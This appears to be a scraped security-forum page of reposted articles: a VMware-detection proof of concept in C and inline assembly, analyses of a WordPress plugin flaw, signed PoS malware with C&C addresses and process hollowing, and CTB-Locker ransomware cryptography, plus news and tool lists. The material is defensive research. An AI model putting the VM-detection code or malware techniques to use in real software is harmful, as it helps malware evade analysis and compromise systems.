http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
  17. Vmware Detection Ladies and gentleman – I give you yet another case of VMware detection. Unfortunately, this only works for VMware. A friend of mine, one Aaron Yool told of me a way to detect VMware via the use of privileged instructions. Specifically the “IN” instruction. This instruction is used for reading values from I/O ports. What the heck is that? According to the IA32 manual, I/O ports are created in system hardware by circuity that decodes the control, data, and address pins on the processor. These I/O ports are then configured to communicate with peripheral devices. An I/O port can be an input port, an output port, or a bidirectional port. Some I/O ports are used for transmitting data, such as to and from the transmit and receive registers, respectively, of a serial interface device. Other I/O ports are used to control peripheral devices, such as the control registers of a disk controller. Dry material huh? That’s the Intel manual for you. Normally you can’t execute this instruction on Windows in user mode – its a SYSTEM instruction like HLT which are reserved for ring 0. On VMware however, you can call it from ring 3. What can be done if a user mode program and run system level instructions? The sky is the limit, but think rootkit without admin. Pretty wicked stuff. Is this the case here? No, not yet anyways. For now though, we have here a simple way of checking to see if we’re inside VMWare, POC included. We’re using SEH (Structured Exception Handling) here in case Windows complains about the instruction being privileged. Who here likes code? I do! // ------------------------------------------------------------------------------// THE BEER-WARE LICENSE (Revision 43):// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you // can do whatever you want with this stuff. If we meet some day, and you think // this stuff is worth it, you can buy me a beer in return // ------------------------------------------------------------------------------ #include <iostream> #include <windows.h> unsigned vmware(void) { __asm{ mov eax, 0x564d5868 mov cl, 0xa mov dx, 0x5658 in eax, dx cmp ebx, 0 jne matrix xor eax, eax ret matrix: mov eax, 1}; } int seh_filter(unsigned code, struct _EXCEPTION_POINTERS* ep) { return EXCEPTION_EXECUTE_HANDLER; } int _tmain(int a, _TCHAR* argv[]) { __try { if(vmware()) goto matrix; } __except(seh_filter(GetExceptionCode(), GetExceptionInformation())) { goto stage2; } stage2: std::cout << "Isn't real life boring?"<<std::endl; exit(0); matrix: std::cout << "The Matrix haz you Neo..."<<std::endl; exit(1); } PoC pic: Happy hacking! Sursa: Vmware Detection « Joe's Security Blog
  18. Analysis of the Fancybox-For-WordPress Vulnerability By Marc-Alexandre Montpas on February 16, 2015 We were alerted last week of a malware outbreak affecting WordPress sites using version 3.0.2 and lower of the fancybox-for-wordpress plugin. As announced, here are some of the details explaining how attackers could use this vulnerability to inject malicious iframes on websites using this plugin. Technical details This vulnerability exploited a somewhat well-known attack vector amongst WordPress plugins: unprotected “admin_init” hooks. As “admin_init” hooks can be called by anyone visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, this snippet could be used by remote attackers to change the plugin’s “mfbfw”option with any desired content. This got us asking ourselves, what was this option used for? We found that this option was being used in many places within the plugins codebase. The one that caught our attention was inside the mfbfw_init() function. This basically displays jQuery scripts configured to work with parameters that were set up earlier, in mfbfw_admin_options(). As you can see from the above picture, the $settings array is not sanitized before being output to the client, which means an attacker, using the unprotected “admin_init” hook, could inject malicious Javascript payloads into every page of a vulnerable website, such as the “203koko” iframe injection we presented last week. Sursa: http://blog.sucuri.net/2015/02/analysis-of-the-fancybox-for-wordpress-vulnerability.html
  19. Memex - DARPA's search engine for the Dark Web by Mark Stockley on February 16, 2015 | 3 Comments Anyone who used the World Wide Web in the nineties will know that web search has come a long way. Sure, it was easy to get more search results than you knew what to do with in 1999 but it was really hard to get good ones. What Google did better than Alta Vista, HotBot, Yahoo and the others at the dawn of the millennium was to figure out which search results were the most relevant and respected. And so it's been ever since - search engines have become fast, simple interfaces that compete based on relevance and earn money from advertising. Meanwhile, the methods for finding things to put in the search results have remained largely the same - you either tell the search engines your site exists or they find it by following a link on somebody else's website. That business model has worked extremely well but there's one thing that it does not excel at - depth. If you don't declare your site's existence and nobody links to it, it doesn't exist - in search engine land at least. Google's stated aim may be to organize the world's information and make it universally accessible and useful but it hasn't succeeded yet. That's not just because it's difficult, it's also because Google is a business and there isn't a strong commercial imperative for it to index everything. Estimates of how much of the web has been indexed vary wildly (I've seen figures of 0.04% and 76% so we can perhaps narrow it down to somewhere between almost none and almost all) but one thing is sure, there's enough stuff that hasn't been indexed that it's got it's own name - the Deep Web. It's not out of the question to suggest that the part of the web that hasn't been indexed is actually bigger than the part that has. A subset of it - the part hosted on Tor Hidden Services and referred to as the Dark Web - is very interesting to those in law enforcement. There are all manner of people, sites and services that operate over the web that would rather not appear in your Google search results. If you're a terrorist, paedophile, gun-runner, drug dealer, sex trafficker or serious criminal of that ilk then the shadows of the Deep Web, and particularly the Dark Web, offer a safer haven then the part occupied by, say, Naked Security or Wikipedia. Enter Memex, brainchild of the boffins at DARPA, the US government agency that built the internet (then ARPANET). DARPA describes Memex as a set of search tools that are better suited to government (presumably law enforcement and intelligence) use than commercial search engines. Whereas Google and Bing are designed to be good-enough systems that work for everyone, Memex will end up powering domain-specific searches that are the very best solution for specific narrow interests (such as certain types of crime.) Today's web searches use a centralized, one-size-fits-all approach that searches the internet with the same set of tools for all queries. While that model has been wildly successful commercially, it does not work well for many government use cases. The goal is for users to ... quickly and thoroughly organize subsets of information based on individual interests ... and to improve the ability of military, government and commercial enterprises to find and organize mission-critical publically [sic] available information on the internet. Although Memex will eventually have a very broad range of applications, the project's initial focus is on tackling human trafficking and slavery. According to DARPA, human trafficking has a significant Dark Web presence in the form of forums, advertisements, job postings and hidden services(anonymous sites available via Tor). Memex has been available to a few law enforcement agencies for about a year and has already been used with some success. In September 2014, sex trafficker Benjamin Gaston was sentenced to a minimum of 50 years in prison having been found guilty of "Sex Trafficking, as well as Kidnapping, Criminal Sexual Act, Rape, Assault, and Sex Abuse - all in the First Degree". Scientific American reports that Memex was in the thick of it: A key weapon in the prosecutor's arsenal, according to the NYDA's Office: an experimental set of internet search tools the US Department of Defense is developing to help catch and lock up human traffickers. The journal also reports that Memex is used by the New York County District Attorney's Office in every case pursued by its Human Trafficking Response Unit, and it has played a role in generating at least 20 active sex trafficking investigations. If Memex carries on like this then we'll have to think of a new name for the Dark Web. Sursa: https://nakedsecurity.sophos.com/2015/02/16/memex-darpas-search-engine-for-the-dark-web/
  20. Russian researchers expose breakthrough U.S. spying program BY JOSEPH MENN SAN FRANCISCO Mon Feb 16, 2015 5:10pm EST (Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives. That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations. Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0) The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the agency responsible for gathering electronic intelligence on behalf of the United States. A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the intelligence agency valued these spying programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it. NSA spokeswoman Vanee Vines declined to comment. Kaspersky published the technical details of its research on Monday, which should help infected institutions detect the spying programs, some of which trace back as far as 2001. The disclosure could further hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have hurt the United States' relations with some allies and slowed the sales of U.S. technology products abroad. The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection. Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering. "There can be serious negative effects on other U.S. interests," Swire said. TECHNOLOGICAL BREAKTHROUGH According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on. Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up. "The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview. Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections. Kaspersky's reconstructions of the spying programs show that they could work in disk drives sold by more than a dozen companies, comprising essentially the entire market. They include Western Digital Corp, Seagate Technology Plc, Toshiba Corp, IBM, Micron Technology Inc and Samsung Electronics Co Ltd. Western Digital, Seagate and Micron said they had no knowledge of these spying programs. Toshiba and Samsung declined to comment. IBM did not respond to requests for comment. GETTING THE SOURCE CODE Raiu said the authors of the spying programs must have had access to the proprietary source code that directs the actions of the hard drives. That code can serve as a roadmap to vulnerabilities, allowing those who study it to launch attacks much more easily. "There is zero chance that someone could rewrite the [hard drive] operating system using public information," Raiu said. Concerns about access to source code flared after a series of high-profile cyberattacks on Google Inc and other U.S. companies in 2009 that were blamed on China. Investigators have said they found evidence that the hackers gained access to source code from several big U.S. tech and defense companies. It is not clear how the NSA may have obtained the hard drives' source code. Western Digital spokesman Steve Shattuck said the company "has not provided its source code to government agencies." The other hard drive makers would not say if they had shared their source code with the NSA. Seagate spokesman Clive Over said it has "secure measures to prevent tampering or reverse engineering of its firmware and other technologies." Micron spokesman Daniel Francisco said the company took the security of its products seriously and "we are not aware of any instances of foreign code." According to former intelligence operatives, the NSA has multiple ways of obtaining source code from tech companies, including asking directly and posing as a software developer. If a company wants to sell products to the Pentagon or another sensitive U.S. agency, the government can request a security audit to make sure the source code is safe. "They don't admit it, but they do say, 'We're going to do an evaluation, we need the source code,'" said Vincent Liu, a partner at security consulting firm Bishop Fox and former NSA analyst. "It's usually the NSA doing the evaluation, and it's a pretty small leap to say they're going to keep that source code." Kaspersky called the authors of the spying program "the Equation group," named after their embrace of complex encryption formulas. The group used a variety of means to spread other spying programs, such as by compromising jihadist websites, infecting USB sticks and CDs, and developing a self-spreading computer worm called Fanny, Kasperky said. Fanny was like Stuxnet in that it exploited two of the same undisclosed software flaws, known as "zero days," which strongly suggested collaboration by the authors, Raiu said. He added that it was "quite possible" that the Equation group used Fanny to scout out targets for Stuxnet in Iran and spread the virus. (Reporting by Joseph Menn; Editing by Tiffany Wu) Sursa: Russian researchers expose breakthrough U.S. spying program | Reuters
  21. DbgKit February 15, 2015 | Permalink DbgKit is the first GUI extension for Debugging Tools for Windows. It will show you hierarchical view of processes and detailed information about each process including its full image path, command line, start time, memory statistics, vads, handles, threads, security attributes, modules, environment variables and more. WARNING: Using debugger extensions in a local kernel-mode debugging session or with tools like LiveKd that simulate local kernel debugging can cause the extensions to hang or to show not precise data. Download Sursa: Andrey Bazhan · DbgKit
  22. Signed PoS Malware Used In Pre-Holiday Attacks, Linked to Targeted Attacks 1:04 pm (UTC-7) | by Jay Yaneza (Threats Analyst) Last year, we detected some new PoS malware just before the holiday season. At that time, we omitted mentioning one fact – that the file was digitally signed with a valid certificate. Our research shows that these attacks targeting PoS malware are growing in sophistication, with code signing and improved encryption becoming more commonplace. We were also able to connect this PoS malware to the group involved with the Anunak malware—which is related to the Carbanak gang as posted by our colleagues over at Fox-IT. Figure 1. Sample with valid digital signature (taken on November 27, 2014) Malware code signing has increased in recent years and malware authors often seek keys that allow file signing to make malicious files appear as legitimate software. In this case, the attackers went through the whole process of requesting a digital certificate to sign the binary from a known certificate authority. COMODO, the issuer of this certificate, has since revoked the signing certificate. With this in mind, we began searching for additional components of this binary. This blog entry adds context to our our original blog post published last year. Carefully crafted binaries Based on other PoS malware that we have observed, we knew that this should be a multicomponent malware. As such, over the next couple of months after this incident, we have been monitoring this threat – one that caught our interest was a file with the SHA1 hash d8e79a7d21a138bc02ec99cfb9dc59e2e0cedf09. We noted some important things about this particular file: First, the file itself was signed similarly: used the same name, email and certificate authority. Secondly, the file construction was just too careful for standard malware that we see on a daily basis. Analysis of the file showed that it has its own encryption method that cannot be identified by common tools and it only decrypts the necessary code, which is destroyed after being used. Another interesting thing is that theGetProcAddress API was used (which is almost abandoned nowadays). It uses a brute force way to search the PE header table and calls NT* functions. During installation, the .text section is reused by the unpack code and installation, as seen below: Figure 2. Section reuse It then starts the host process svchost.exe with the parameters -k netsvc, with a suspended status. Once done, it proceeds to prepare a decrypted PE image file which can be written into memory. If everything is ready, it calls the NT* function to write the PE image into the host’s process memory, set the thread context and resume the thread. Finally, the PE image in memory is destroyed immediately. Figure 3. CreateProcess with suspended creation state Figure 4. Decrypted PE image file in memory While the PE image loaded in memory can be dumped to file, the string and API calls are still protected and it’s not straight forward to decipher. A decoder table was necessary to understand the inner working of the file, as shown below: Figure 5. Decoder table Using homemade decryption tools, the following functionality was discovered: Two fixed C&C Servers: 83.166.234.250 (ports 80 and 443), and 83.166.234.237 (port 443) Searching for the NSB Retail System Logs at C:\NSB\Coalition\Logs and nsb.pos.client.log Searching of files with the following extensions: bml cgi gif htm html jpg php png pst shtml txt [*]The use of VNC and Remote Desktop [*]Modifying the settings of the Windows firewall to give itself network access [*]Database connectivity [*]Reference to mimikatz – a tool to recover clear text passwords from LSASS [*]Encryption and decryption routines [*]Keylogging functionality Targeting the Top PoS Vendor: Epicor This was not your run-of-the-mill malware. It was a point-of-sale (PoS) malware that expliclty targeted theEpicor/NSB PoS system. Epicor was recently recognized as the top vendor of PoS software and leader in number of accounts and revenue over other top PoS vendors. A second look at the binary indicates that this particular file is related to the CARBERP banking family of Trojans, whose source code was leaked around 2013. In particular, this file had the following CARBERP plugins: plug and vnc.plug – VNC Plugin plug – iFOBS remote banking system plug – Ammy Remote Desktop Plugin We went back and cross-referenced other files to look for other complex malware samples that could be linked to this particular sample. We came across another one (SHA1 hash: a0527db046665ee43205f963dd40c455219beddd) which shared almost similar complexity. Some of the significant characteristics are listed below: Drops a file called ms*.exe and creates a startup item under the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run key. Figure 6. Created registry entry Aside from this, it changes the Zone.Identifier alternate data stream to avoid the pop-up warning: Figure 7. Alternate data stream It attempts to acquire elevated privileges via SeRestorePrivilege, SeBackUpPrivilege, and SeDebugPrivilege. Privileges like these allows the caller all access to the process, including the ability to call TerminateProcess(), CreateRemoteThread(), and other potentially dangerous API calls on the target process. It also has anti-debugging functions, and has its own dynamic unpacking code: Unpack code into .txt and jump back Allocate a block memory in 0x7FF90000 (almost reach user mode limitation) Unpack code into 0x7FF90000 and jump to here C&C server communication Using feedback provided by our Smart Protection Network, we looked for other threats that were similar to these two samples. A quick evolution We saw a file that was similar to the above files located in C:\Windows\SysWOW64 (for Windows 64-bit) andC:\Windows\System32 (for Windows 32-bit). The difference, however, was that it was for a DLL file (SHA1 hash: CCAD1C5037CE2A7A39F4B571FC10BE213249E611). Careful analysis revealed that, although compiled as a DLL file, it just uses the same cipher as the earlier samples. However, here a different C&C server was used (5.61.38.52:443). This change may have been an attempt to evade analysis, as some automated analysis tools do not process DLLs since they cannot be directly executed. Figure 8. Decoder table These indicators show that these file(s) were the work of a fairly sophisticated group of attackers. Who’s responsible for this? As it turns out, we can attribute this to the European APT group that uses Anunak malware, which was previously reported by Group-IB and Fox-IT. Our research leads us to believe that the files listed below could be used in similar campaigns within the United States and Canada: Table 1. List of hashes and detection names (click to enlarge) Table 2. List of hashes and C&C servers (click to enlarge) It should be noted that there are two files listed here (5fa2a0639897a42932272d0f0be2ab456d99a402 and CCAD1C5037CE2A7A39F4B571FC10BE213249E611) have fake compile time dates, which is a visible attempt to mask the file’s validity. According to the certificate revocation list, the certificates used to sign these malicious files were revoked on August 05, 2014. Figure 9. Certificate Revocation List However, the files were still signed with the certificates beyond that date. Here is the list of the files with digital certificates, and their signing time: Table 3. Time and date of malware signing Summary Trend Micro already detects all files listed above, where applicable. We would also like to recommend these steps in order to catch these kinds of attacks earlier: Audit accounts for failed/irregular logins. As seen by one of the tools used in this campaign, a password/credential dumper was used. If a user account was suddenly seen accessing a resource that looked unusual, then this may be a sign. Audit network log for abnormal connections. A network scanner was also used in this campaign, which can be used to enumerate a host’s resources. A passive network scanner, which observes anomalies in network traffic, can be used to flag these events and is often a built-in functionality of a breach detection system. Study warnings from security solutions. If you see a combination of hacking tools, backdoors and Trojans on a particular host, it may be efficient to acquaint oneself if these detections should be of an immediate concern – or not. In today’s world where there are just a lot of malware being seen in a daily basis, it is important to note which malware could severely affect your business. For a full list of things to check, you can refer to 7 Places to Check for Signs of a Targeted Attack in Your Network. To learn more about PoS RAM scraper malware, you can refer to our previous research paper titled PoS RAM Scraper Malware: Past, Present and Future. Additional information and analysis by Abraham Camba, Jane Hsieh, and Kenney Lu. Sursa: http://blog.trendmicro.com/trendlabs-security-intelligence/signed-pos-malware-used-in-pre-holiday-attacks-linked-to-targeted-attacks/
  23. CTB-Locker encryption/decryption scheme in details After my last post about CTB-Locker I received a lot of e-mails from people asking for a complete analysis of the malware. Most of them wanted to know if it’s possible to restore the compromised files without paying the ransom. The answer is simple: it’s impossible without knowing the Master key! That key resides on the malicious server and it’s the only way to restore every single compromised file. There are a some articles on the net about CTB-Locker’s modus-operandi. Everyone knows that ZLib is used, AES is used but only few of them mention the use of SHA256+Curve. To explain everything in details I’ll show you how encryption/decryption is done, step by step. Preamble: HIDDENINFO HiddenInfo file is the core of the malware, it’s full of precious data. There’s no need to explain every field of the file, a closer look at the first part of it would suffice because it has an important part in the encryption/decryption scheme. [TABLE=width: 838] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [/TD] [TD=class: code]DCE1C1 call ds:CryptGenRandom DCE1C7 lea eax, [ebp+systemTimeAsFileTime] DCE1CA push eax DCE1CB call ds:GetSystemTimeAsFileTime DCE1D1 call ds:GetTickCount DCE1D7 mov [ebp+gettickcountVal], eax DCE1DA call ds:GetCurrentThreadId DCE1E0 mov esi, eax DCE1E2 rol esi, 10h ; Shift ThreadID DCE1E5 call ds:GetCurrentProcessId DCE1EB xor eax, esi ; ThreadID and ProcessID values inside the same dword DCE1ED mov [ebp+threadID_processID], eax DCE1F0 mov esi, 0EB7910h DCE1F5 lea edi, [ebp+machineGuid] DCE1F8 movsd ; Move MachineGUID DCE1F9 movsd DCE1FA movsd DCE1FB lea eax, [ebp+random] ; Random sequence of bytes DCE1FE push 34h ; Number of bytes to hash DCE200 push eax ; Sequence of bytes to hash DCE201 mov ecx, ebx ; Output buffer DCE203 movsd DCE204 call SHA256 ; SHA256(random) DCE209 mov al, [ebx+1Fh] DCE20C and byte ptr [ebx], 0F8h DCE20F push 0E98718h ; Basepoint DCE214 and al, 3Fh DCE216 push ebx ; SHA256(random) DCE217 push [ebp+outputBuffer] ; Public key DCE21A or al, 40h DCE21C mov [ebx+1Fh], al DCE21F call curve_25519 [/TD] [/TR] [/TABLE] The snippet is part of a procedure I called GenSecretAndPublicKeys. The secret key is obtained applying SHA256 to a random sequence of 0x34 bytes composed by: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code]0x14 bytes: from CryptGenRandom function 0x08 bytes: from GetSystemTimeAsFileTime 0x04 bytes: from GetTickCount 0x04 bytes: from (ThreadID ^ ProcessID) 0x10 bytes: MachineGuid [/TD] [/TR] [/TABLE] Curve25519 is used to generate the corresponding public key. You can recognize the algo from Basepoint vector because it’s a 0x09 byte followed by a series of 0x00 bytes (For a quick overview over the Elliptic curve algorithm used by the malware take a look here: Curve25519: high-speed elliptic-curve cryptography). GenSecretAndPublicKeys is called two times, so two private and two public keys are created. I name them as ASecret, APublic, BSecret and BPublic. [TABLE=width: 669] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code]DCF1E7 mov [esp+274h+public], offset MasterPublic ; MPublic key DCF1EE push eax ; BSecret DCF1EF lea eax, [ebp+Shared_1] ; Shared_1 DCF1F5 push eax DCF1F6 call curve_25519 DCF1FB add esp, 0Ch DCF1FE lea eax, [ebp+Shared_1] DCF204 push 20h DCF206 push eax DCF207 lea ecx, [ebp+aesKey] ; Hash is saved here DCF20A call SHA256 [/TD] [/TR] [/TABLE] SHA256(curve_25519(Shared_1, BSecret, MPublic)) Shared secret computation takes place. MPublic is the Master public key and it’s visible inside the memory address space of the malware. The Master secret key remains on the malicious server. To locate the Master public key is pretty easy because it’s between the information section (sequence of info in various languages) and the “.onion” address. Shared secret is then putted inside SHA256 hash algorithm, and the result is used as a key for AES encryption: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: code]DCF20F lea eax, [ebp+aesExpandedKey] DCF215 push eax DCF216 mov edx, 100h DCF21B lea ecx, [ebp+aesKey] DCF21E call AEXExpandKey DCF223 add esp, 0Ch DCF226 xor edi, edi DCF228 lea ecx, [ebp+aesExpandedKey] DCF22E lea eax, [edi+0EF71ACh] DCF234 push ecx DCF235 push eax DCF236 push eax DCF237 call AES_ENCRYPT ; AES encryption [/TD] [/TR] [/TABLE] The malware encrypts a block of bytes (named SecretInfo) composed by: [TABLE=width: 630] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]SecretInfo: ASecret ; a secret key generated by GenSecretAndPublicKeys MachineGuid ; Used to identify the infected machine Various information (fixed value, checksum val among others) [/TD] [/TR] [/TABLE] Not so hard but it’s better to outline everything: ASecret = SHA256(0x34_random_bytes) Curve_25519(APublic, ASecret, BasePoint) BSecret = SHA256(0x34_random_bytes) Curve_25519(BPublic, BSecret, BasePoint) Curve_25519(Shared_1, BSecret, MPublic) AES_KEY_1 = SHA256(Shared_1) Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1) Part of these informations are saved inside HiddenInfo file, more precisely at the beginning of it: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]HiddenInfo: +0x00 offset: APublic +0x24 offset: BPublic +0x44 offset: Encrypted_SecretInfo [/TD] [/TR] [/TABLE] So, two public keys are visible, but private key ASecret is encrypted. It’s impossible to get the real ASecret value without the AES key… Ok, now that you know how HiddenInfo file is created I can start with the file encryption scheme. CTB-Locker file encryption [TABLE=width: 1138] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [/TD] [TD=class: code]C74834 lea eax, [ebp+50h+var_124] ; Hash will be saved here C7483A push eax C7483B lea eax, [ebp+50h+var_E4] C74841 push 30h C74843 lea edi, [ebp+50h+var_D4] C74849 push eax ; 0x30 random bytes C7484A rep movsd C7484C call SHA256Hash ... C7486E push eax ; BasePoint C7486F lea eax, [ebp+50h+var_124] C74875 push eax ; CSecret: SHA256(0x30_random_bytes) C74876 lea eax, [ebp+50h+var_B4] C74879 push eax ; CPublic C7487A call curve25519 ; Generate a public key C7487F push offset dword_C943B8 ; DPublic: first 32 bytes of HiddenInfo C74884 lea eax, [ebp+50h+var_124] C7488A push eax ; CSecret C7488B lea eax, [ebp+50h+var_164] C74891 push eax ; Shared_2 C74892 call curve25519 ; Generate shared secret C74897 lea eax, [ebp+50h+var_144] C7489D push eax C7489E lea eax, [ebp+50h+var_164] C748A4 push 20h C748A6 push eax ; Shared_2 C748A7 call SHA256Hash ; SHA256(Shared_2) ... C74955 push 34h C74957 push [ebp+50h+var_18] ; Compression level: 3 C7495A lea eax, [ebp+50h+PointerToFileToEncrypt] C7495D push eax ; Original file bytes to compress C7495E call ZLibCompress ... C74B1F push [ebp+50h+var_4] C74B22 lea ecx, [ebp+50h+expandedKey] ; SHA256(Share_2) is used as key C74B28 push [ebp+50h+var_4] C74B2B call AES_Encrypt ; It encrypts 16 bytes per round starting from the first 16 bytes of the ZLib compressed file C74B30 add [ebp+50h+var_4], 10h C74B34 dec ebx ; Increase the pointer to the bytes to encrypt C74B35 jnz short loc_C74B1F ; Jump up and encrypt the next 16 bytes [/TD] [/TR] [/TABLE] It’s quite easy indeed, it uses the same functions (SHA256, Curve, AES). To understand what’s going on you only have to follow the code. The operations sequence is: CSecret = SHA256(0x30_random_bytes) Curve_25519(CPublic, CSecret, BasePoint) Curve_15519(Shared_2, CSecret, APublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = ZLibCompress(OriginalFile) Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY2) DPublic inside the disassembled code is indeed APublic (first 32 bytes of HiddenInfo) That’s the way how CTB-Locker encrypts the bytes of the orginal file. These bytes are saved into the new compromised file with some more data. A typical compromised file has the next structure: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code]+0x00 offset: CPublic +0x20 offset: AES_Encrypt(InfoVector, AES_KEY_2) +0x30 offset: AES_Encrypt(ZLibFile, AES_KEY2) [/TD] [/TR] [/TABLE] InfoVector is a sequence of 16 bytes with the first four equals to “CTB1?, this tag word is used to check the correctness of the key provided by the server during the decryption routine. The decryption demonstration feature, implemented by the malware to prove that it can restore the file, uses AES_KEY_2 directly. If you remember the key was saved inside HiddenInfo, there are a total of five saved keys. In this case if you have CSecret you can easily follow the process described above (remember that APublic comes from the first 32 bytes of HiddenInfo), but without CSecret it’s impossible to restore the original files. It’s important to note that in the encryption process CTB-Locker doesn’t need an open internet connection. It doesn’t send keys/data to the server, it simply encrypts everything! Internet connection is needed in the decryption part only. CTB-Locker file decryption At some point, before the real decryption process, there’s a data exchange between the infected machine and the malicious server. The malware sends a block of bytes (taken from HiddenInfo) to the server and the server replies sending back the unique decryption key. The block is composed by the BPublic key, SecretInfo and some minor things: [TABLE=width: 628] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code]DataToServer: 32 bytes: BPublic 90 bytes: SecretInfo 16 bytes: general info [/TD] [/TR] [/TABLE] The malware uses the key to restore the files. Do you remember the decryption part from my last post? Well, the real decryption scheme is not so different. There’s one more step, the calculation of the AES key. To do that the unique key sent by the server is used to decrypt every file: curve_25519(Shared, Unique_Key, first_0x20_byte_from_compromised_file) AES_DECRYPTION_KEY = SHA256(Shared) ZLibFile = AES_Decrypt(Encrypted_File, AES_DECRYPTION_KEY) OriginalFile = ZLibDecompress(ZLibFile) The unique key is sent just one time, so the decryption method needs only one key to decrypt all the compromised files. How is it possible? My explanation From HiddenInfo part I have: Curve_25519(APublic, Asecret, BasePoint) Curve_25519(BPublic, BSecret, BasePoint) Curve_25519(Shared_1, BSecret, MPublic) AES_KEY_1 = SHA256(Shared_1) Encrypted_SecretInfo = AES_ENCRYPT(SecretInfo, AES_KEY_1) The server receives DataToServer and it applies the principle of elliptic curve: Curve_25519(Shared_1, MSecret, BPublic) Shared_1 from the server is equal to Shared_1 calculated in the HiddenInfo creation part. Now, with Shared_1 it AES decrypts SecretInfo obtaining ASecret key. ASecret is the key used to decrypt all the compromised files. From Encryption part: Curve_25519(CPublic, CSecret, BasePoint) Curve_15519(Shared_2, CSecret, APublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = ZLibCompress(OriginalFile) Encrypted_File = AES_Encrypt(ZLibFile, AES_KEY_2) Saying that, here is how to use ASecret in the decryption process (applying the same EC principle): Curve_25519(Shared_2, ASecret, CPublic) AES_KEY_2 = SHA256(Shared_2) ZLibFile = AES_Decrypt(Encrypted_File, AES_KEY_2) OriginalFile =ZLibDecompress(ZLibFile) So, ASecret is the Unique_Key computed by the server and it’s used to decrypt every file. That means one thing only, without MSecret you can’t restore your original files… Final thoughts There’s nothing much to say really. CTB-Locker is dangerous and it will damage systems until people will do double-click over attachments.. sad but true. Feel free to contact me for comments, criticisms, suggestions, etcetc! Sursa: https://zairon.wordpress.com/2015/02/17/ctb-locker-encryptiondecryption-scheme-in-details/
  24. Android Malware Analysis Tools [TABLE=width: 900] [TR] [TD=class: news-txt, width: 900, align: left] TOOLS » AFLogical - Android forensics tool developed by viaForensics » AndroChef - Java Decompiler apk, dex, jar and java class-files » Androguard - Reverse engineering, Malware and goodware analysis of Android applications » Android Loadable Kernel Modules » Android SDK » Android4me - J2ME port of Google's Android » Android-apktool - A tool for reverse engineering Android apk files » Android-forensics - Open source Android Forensics app and framework » Android-random - Collection of extended examples for Android developers » APK Studio - Android Reverse Engineering Tool By Vaibhav Pandey a.k.a VPZ » ApkAnalyser - Static, virtual analysis tool » Apk-extractor - Android Application (.apk) file extractor and Parser for Android Binary XML » Apkinspector - Powerful GUI tool for analysts to analyze the Android applications » Apk-recovery - Recover main resources from your .apk file » ART - GUI for all your decompiling and recompiling needs » Audit tools » Canhazaxs - A tool for enumerating the access to entries in the file system of an Android device » Dava - Decompiler for arbitrary Java bytecode » DDMS - Dalvik Debug Monitor Server » Decaf-platform - DECAF Binary Analysis Platform » DecoJer - Java Decompiler » Dedexer - Disassembler tool for DEX files. » Device Monitor - Graphical user interface for several Android application debugging and analysis tools » Dex2jar - Tools to work with android .dex and java .class files » Dex-decomplier - Dex decompiler » Dexinfo - A very rudimentary Android DEX file parser » Dexter - Static android application analysis tool » Dexterity - Dex manipulation library » Dextools - Miscellaenous DEX (Dalvik Executable) tools » Drozer - Comprehensive security audit and attack framework for Android » Heimdall - Cross-platform open-source tool suite used to flash firmware (aka ROMs) onto Samsung mobile devices » Hidex - Demo application where a method named thisishidden() in class MrHyde is hidden from disassemblers but no called by the app » Hooker - Automated Dynamic Analysis of Android Applications » JAD - Java Decompiler » JADX - Dex to Java decompiler » JD-GUI - Standalone graphical utility that displays Java source 